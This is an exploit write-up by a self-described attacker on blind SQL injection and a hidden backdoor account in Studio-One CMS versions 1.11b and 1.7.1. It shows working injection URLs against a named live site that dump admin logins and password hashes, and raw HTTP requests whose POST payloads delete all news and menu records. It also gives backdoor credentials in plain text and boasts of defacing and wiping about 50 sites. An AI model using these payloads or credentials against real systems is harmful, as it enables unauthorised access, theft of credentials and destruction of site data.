Studio-One CMS 1.11b / 1.7.1 Blind SQL Injection

`========================================================  
Vulnerable Software(S): CMS | 1.11b/CMS | 1.7.1 From Studio-one.am  
Vulnerabilities: This Content management systems suffers from  
Remote Blind SQl injection and Backdoor account.  
Software License: Commercial  
Vendor: studio-one.am  
Discovered and Exploited: In Wild  
========================================================  
  
I'M=> AkaStep<= RESPONSIBLE FOR EVERYTHING IN THIS advisory=  
********************** REALLY! ********************************************  
******************ENJOY MAXIMALLY**************************************  
  
  
Full Disclosure:  
  
  
The following CMS | 1.11b and CMS | 1.7.1 (From Studio-one.am) content management systems  
suffers from Remote Blind SQl injection and Backdoor account.  
  
//TRUE  
http://galatv.am/news/other/aimm-naxagahh%27%20or%20sleep(10)--%20and%205=%275.html  
  
  
We got time delay:  
  
galatv.am CMS | 1.11b  
  
http://galatv.am/news/other/aimm-naxagahh%27%20order%20by%2026--%20and%205=%275.html  
Got Columns count: 26  
  
  
  
Problem number 1: We can't use =>,<= Otherwise we'll get 404 (May be rewrite rule?)  
  
Bypass?Pretty simple: hex() representation of =>,=> so it's=> %2C  
  
http://galatv.am/news/other/aimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html  
  
  
  
http://galatv.am/news/other/aimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html  
  
  
Success!  
  
  
http://galatv.am/news/other/saimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26--%20and%205=%275.html  
  
  
21 22 21 24 14-  
  
  
http://galatv.am/news/other/saimm-naxagahh%27%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2Cgroup_concat%28table_name%29%2C22%2C23%2C24%2C25%2C26%20from%20information_schema.tables--%20and%205=%275.html  
  
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,s1_ads,s1_ads_menu_rel,s1_ads_ml,s1_adsgroup,s1_adsgroup_ml,s1_answers,s1_answers_ml,s1_autor,s1_autor_m   
  
  
So we need obtain:  
  
login  
password  
  
from  
  
s1_users  
  
  
galatv.am/news/other/saimm-naxagahh' union select 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2Cgroup_concat(login%2Cpassword)%2C22%2C23%2C24%2C25%2C26 from s1_users-- and 5='5.html  
  
  
  
  
100%  
----------------------------------------------------  
admin  
6dedf4ba59fbcd8c2d72eec63738fc6d  
GalaAdmin  
4bad4ecf9b88e344a7e6fbe517d4e590  
----------------------------------------------------  
newPass123  
  
  
  
Printscreen: http://s44.radikal.ru/i106/1209/3c/64f2a7cf8278.png  
  
  
  
OwNEd! http://zone-h.org/mirror/id/18297506  
  
Done!  
  
Ok.After gaining access to administration panel i noticed theris 2800>= news exists in database.  
Ownage without "rm"s or without "drop"s agains .am domains is not interesting anymore.  
Searching..Searching..Got it:  
  
Here is truncating way:  
  
  
------------------------------------------------------------------------------------------------------------------------  
Live HTTP Headers:  
  
URL: http://galatv.am/admin/news-content/news?viewAjax=1&action=delete&tpl=view.tpl  
  
  
Host: galatv.am  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0  
Accept: */*  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 18  
Cookie: PHPSESSID=ak1cgrd9c1rlm5fgca26vnjh73  
Pragma: no-cache  
Cache-Control: no-cache  
  
  
  
POST DATA:  
  
viewAjax=1&id=1000000000000 or id!=3--  
  
*REPLAY*  
  
------------------------------------------------------------------------------------------------------------------------  
  
  
Printscreen: http://s019.radikal.ru/i625/1209/95/fccad046aa62.png  
  
BoOm!) All news was successfully "truncated" using SQLi vuln)  
  
  
  
  
Then i needed to truncate menu sections:  
  
Same technique:  
  
  
------------------------------------------------------------------------------------------------------------------------  
Live HTTP Headers:  
  
URL: http://galatv.am/admin/content%20elements/menu?viewAjax=1&action=delete&tpl=view.tpl  
  
  
Host: galatv.am  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0  
Accept: */*  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 16  
Cookie: menutreeNodes=%5B1%5D; PHPSESSID=ak1cgrd9c1rlm5fgca26vnjh73; __utma=137480943.837184604.1346617574.1346617574.1346617574.1; __utmb=137480943.2.10.1346617574; __utmc=137480943; __utmz=137480943.1346617574.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)  
Pragma: no-cache  
Cache-Control: no-cache  
  
  
  
POST DATA:  
viewAjax=1&id=27 or id!=007  
  
------------------------------------------------------------------------------------------------------------------------  
  
Again Boom!)  
  
  
  
  
=================== WE ALSO LOVE BACKDOORS========================  
  
This CMS also suffers from backdoor account which has full administrative privileges.  
It is also hidden account: This means you can't see it from administration panel:  
  
Print screen:  
( Basically: theris 1 backdoor account and 1 legal administrator.  
Notice: backdoor account isn't visible anymre )  
  
http://s53.radikal.ru/i140/1209/c4/685d07418e00.png  
  
  
  
I used this administrative account to deface and "rm" approx 50 .am sites)  
  
Login: admin  
Pass: newPass123  
  
  
  
=====================CMS version 1.7.1 ==============================  
How it looks: http://s019.radikal.ru/i602/1209/2d/85589f0d9f49.png  
  
Also suffers from backdoor account:  
Print screen:  
http://i021.radikal.ru/1209/83/8390644da6b5.png  
  
The account named: admin still invisible again.  
  
  
  
  
<title>:: CMS :: | 1.7.1</title>  
  
Demo:  
http://new.galatv.am/admin/  
  
Login: admin  
Pass: newPass123  
  
  
  
  
This version also is vulnerable to SQLi  
  
Again i'm "rm"-ned all news using SQLi:  
  
  
URL: http://new.galatv.am/admin/news-block/news?action=delete&viewAjax=1&tpl=dt/edit-dialog.tpl  
  
  
Host: new.galatv.am  
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:15.0) Gecko/20100101 Firefox/15.0  
Accept: */*  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 38  
Cookie: PHPSESSID=bqu6dn6ks70iqocivfioetomh7  
Pragma: no-cache  
Cache-Control: no-cache  
  
  
  
POST DATA:  
btnDelete=Delete&btnCancel=Cancel&id=1 or id!=011111111111111  
  
  
Returned:   
  
{"succsess":true,"records":["1 or id!=011111111111111"]}  
  
  
==========================================  
To studio-one.am: We luve backdoors too;)  
  
=============== THE END ===================  
  
  
SHOUTZ AND GREAT THANKS TO ALL MY FRIENDS:  
===========================================================  
packetstormsecurity.org  
packetstormsecurity.com  
packetstormsecurity.net  
securityfocus.com  
cxsecurity.com  
security.nnov.ru  
securtiyvulns.com  
securitylab.ru  
secunia.com  
securityhome.eu  
exploitsdownload.com  
exploit-db.com  
to all AA Team + to all Azerbaijan Black HatZ +  
*Especially to my bro CAMOUFL4G3.*  
===========================================================  
  
/AkaStep  
  
`